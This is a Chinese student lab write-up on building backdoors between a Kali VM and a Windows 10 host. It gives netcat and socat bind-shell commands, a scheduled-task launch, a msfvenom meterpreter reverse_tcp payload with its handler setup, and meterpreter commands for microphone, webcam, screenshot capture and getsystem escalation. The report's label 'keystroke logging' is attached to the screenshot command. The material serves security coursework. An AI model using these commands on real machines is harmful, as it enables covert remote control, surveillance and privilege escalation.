• 20155304《网络对抗》Exp2 后门原理与实践


    20155332《网络对抗》Exp2 后门原理与实践

    实验内容 (3.5分)

    (1)使用netcat获取主机操作Shell,cron启动 (0.5分)

    (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

    (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

    (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

    (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

    实验步骤

    3.1使用netcat获取主机操作Shell,cron启动

    1.在win10的cmd里,查询本机ip。
    image
    ip为192.168.1.101

    2.在win10的cmd里,进入ncat,输入ncat -l -e cmd.exe -p 5304
    image
    2.在kali的终端里,输入nc 192.168.1.101 5304 连接win10,获得shell权限

    image

    3.2使用socat获取主机操作Shell, 任务计划启动

    1.在win10中进入控制面板->系统和安全->管理工具->任务计划程序
    然后选择创建一个新任务,填写好任务名称;新建一个触发器,并设置触发器的相关参数;新建操作,设置如图相关参数tcp-listen:端口号 exec:cmd.exe,pty,stderr

    image

    image

    image

    2.在kali虚拟机中,socat - tcp:192.168.1.101:5404
    ,就可以获得win10的shell权限了

    3.3使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    1.在kali虚拟机中用Meterpreter生成后门。
    输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.128 LPORT=5304 -f exe > backdoor.exe
    image

    通过nc指令将生成的后门程序传送到Windows主机上:
    image

    在kali虚拟机终端输入 msfconsole

    image

    在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口

    image

    Linux使用exploit命令开始监听,此时在Win上执行后门程序。

    image

    打开Windows上的后门程序

    此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

    image

    录音功能:record_mic

    image

    拍照功能:webcam_snap

    image

    image

    拍摄视频功能:webcam_stream

    image

    记录击键功能:screenshot

    image

    提权:getuid以及getsystem

    image

  • 相关阅读:
    hdu 4578 线段树 ****
    hdu 4576 概率dp **
    hdu 4622 **
    vue中保存和获取cookie,读写cookie以及设置有效时间等,使用js-cookie
    go语言 strconv.ParseInt 的例子
    【golang】unsafe.Sizeof浅析
    Golang 漫谈之channel妙法
    总结了才知道,原来channel有这么多用法!
    字符集之在UTF-8中,一个汉字为什么需要三个字节?
    什么是Bitmap
  • 原文地址:https://www.cnblogs.com/tyn5304/p/8712198.html
Copyright © 2020-2023  润新知